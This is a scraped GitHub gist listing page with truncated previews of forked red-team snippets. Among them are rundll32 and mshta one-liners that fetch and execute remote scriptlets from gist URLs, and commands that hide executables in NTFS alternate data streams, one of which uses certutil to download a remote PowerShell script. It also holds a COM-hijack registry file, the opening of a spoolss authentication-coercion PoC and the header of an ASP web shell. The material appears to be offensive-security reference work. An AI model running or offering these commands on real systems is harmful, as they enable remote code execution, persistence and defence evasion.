This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include <windows.h> | |
| // All Credit goes to SandboxEscaper | |
| BOOL APIENTRY DllMain(HMODULE hModule, | |
| DWORD ul_reason_for_call, | |
| LPVOID lpReserved | |
| ) | |
| { | |
| switch (ul_reason_for_call) | |
| { | |
| case DLL_PROCESS_ATTACH: |
NullArray
/ instructions.txt
Created
October 4, 2018 05:39
— forked from api0cradle/instructions.txt
xwizard_sct
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| xwizard RunWizard {00000001-0000-0000-0000-0000FEEDACDC} | |
| verclsid.exe /S /C {00000001-0000-0000-0000-0000FEEDACDC} | |
| create new folder and rename file.{00000001-0000-0000-0000-0000FEEDACDC} | |
| rundll32.exe javascript:"\..\mshtml.dll,RunHTMLApplication ";o=GetObject("script:https://gist.githubusercontent.com/NickTyrer/0598b60112eaafe6d07789f7964290d5/raw/7717cfad109fc15a6796dd9119b0267f7a4df3fd/power.sct");close(); | |
| mshta javascript:o=GetObject("script:https://gist.githubusercontent.com/NickTyrer/0598b60112eaafe6d07789f7964290d5/raw/7717cfad109fc15a6796dd9119b0267f7a4df3fd/power.sct");o.Exec();close(); |
NullArray
/ Exe_ADS_Methods.txt
Created
October 4, 2018 05:50
— forked from api0cradle/Exe_ADS_Methods.md
Execute from Alternate Streams
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #Add content to ADS | |
| type C:\temp\evil.exe > "C:\Program Files (x86)\TeamViewer\TeamViewer12_Logfile.log:evil.exe" | |
| extrac32 C:\ADS\procexp.cab c:\ADS\file.txt:procexp.exe | |
| findstr /V /L W3AllLov3DonaldTrump c:\ADS\procexp.exe > c:\ADS\file.txt:procexp.exe | |
| certutil.exe -urlcache -split -f https://raw.githubusercontent.com/Moriarty2016/git/master/test.ps1 c:\temp:ttt | |
| makecab c:\ADS\autoruns.exe c:\ADS\cabtest.txt:autoruns.cab | |
| print /D:c:\ads\file.txt:autoruns.exe c:\ads\Autoruns.exe | |
| reg export HKLM\SOFTWARE\Microsoft\Evilreg c:\ads\file.txt:evilreg.reg | |
| regedit /E c:\ads\file.txt:regfile.reg HKEY_CURRENT_USER\MyCustomRegKey | |
| expand \\webdav\folder\file.bat c:\ADS\file.txt:file.bat |
NullArray
/ winlogon.reg
Created
October 4, 2018 06:37
— forked from api0cradle/winlogon.reg
WinLogon Windows 7 x64 COM Hijack
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Windows Registry Editor Version 5.00 | |
| [HKEY_CURRENT_USER\SOFTWARE\Classes\AtomicRedTeam.1.00] | |
| @="AtomicRedTeam" | |
| [HKEY_CURRENT_USER\SOFTWARE\Classes\AtomicRedTeam.1.00\CLSID] | |
| @="{00000001-0000-0000-0000-0000FEEDACDC}" | |
| [HKEY_CURRENT_USER\SOFTWARE\Classes\AtomicRedTeam] | |
| @="AtomicRedTeam" | |
| [HKEY_CURRENT_USER\SOFTWARE\Classes\AtomicRedTeam\CLSID] | |
| @="{00000001-0000-0000-0000-0000FEEDACDC}" | |
| [HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}] |
NullArray
/ dementor.py
Created
November 1, 2018 01:28
— forked from 3xocyte/dementor.py
rough PoC to connect to spoolss to elicit machine account authentication
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python | |
| # abuse cases and better implementation from the original discoverer: https://github.com/leechristensen/SpoolSample | |
| # some code from https://www.exploit-db.com/exploits/2879/ | |
| import os | |
| import sys | |
| import argparse | |
| import binascii | |
| import ConfigParser |
NullArray
/ fm.php
Created
January 22, 2019 20:17
— forked from heiswayi/fm.php
Single PHP File Manager Script - Screenshot: https://i.imgur.com/4OtrKUz.png
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?php | |
| /** | |
| * File Manager Script | |
| */ | |
| // Default language ('en' and other from 'filemanager-l10n.php') | |
| $lang = 'en'; | |
| // Auth with login/password (set true/false to enable/disable it) | |
| $use_auth = true; |
NullArray
/ img-upload.php
Created
January 22, 2019 20:29
— forked from heiswayi/img-upload.php
Internal Image Hosting Script
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?php | |
| // Configuration | |
| $title = 'Internal Image Hosting Script'; | |
| $filedir = 'up'; // uploaded image dir | |
| $maxsize = 5242880; //max size in bytes | |
| $allowedExts = array('png', 'jpg', 'jpeg', 'gif'); | |
| $allowedMime = array('image/png', 'image/jpeg', 'image/pjpeg', 'image/gif'); | |
| $baseurl = $_SERVER['HTTP_HOST'].dirname($_SERVER['REQUEST_URI']).'/'.$filedir; | |
| function compressImage($source_url, $destination_url, $quality) { |
NullArray
/ form-ui.html
Created
January 22, 2019 20:30
— forked from heiswayi/form-ui.html
Form UI Mockup Framework
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <!DOCTYPE html> | |
| <html lang="en"> | |
| <head> | |
| <meta charset="utf-8" /> | |
| <title>Formalize CSS</title> | |
| </head> | |
| <body> | |
| <div id="wrapper"> | |
| <h1> | |
| Example of all form elements |
NullArray
/ SimpleAuth.php
Created
January 22, 2019 20:30
— forked from heiswayi/SimpleAuth.php
Simple PHP script to protect any PHP page using session
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?php | |
| /* | |
| * Filename: SimpleAuth.php | |
| * Version: 1.0 | |
| * Author: Heiswayi Nrird | |
| * Dscription: Simple PHP script to protect any PHP page using session | |
| * Website: https://heiswayi.nrird.com | |
| * | |
| * HOW TO USE | |
| * ========== |
NullArray
/ shell.asp
Created
January 22, 2019 20:33
— forked from heiswayi/shell.asp
Shell script for ASP.NET
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <%@ Language = VBScript | |
| CodePage = 1252 %> | |
| <% | |
| Option Explicit | |
| '/* --- Options --- */ | |
| Server.ScriptTimeout = 360 ' Seconds | |
| Session.Timeout = 5 ' Minutes | |
| Response.Expires = -1 ' Minutes (expires immediately) | |
| Private sMD5Hash ' MD5("HitU") |
OlderNewer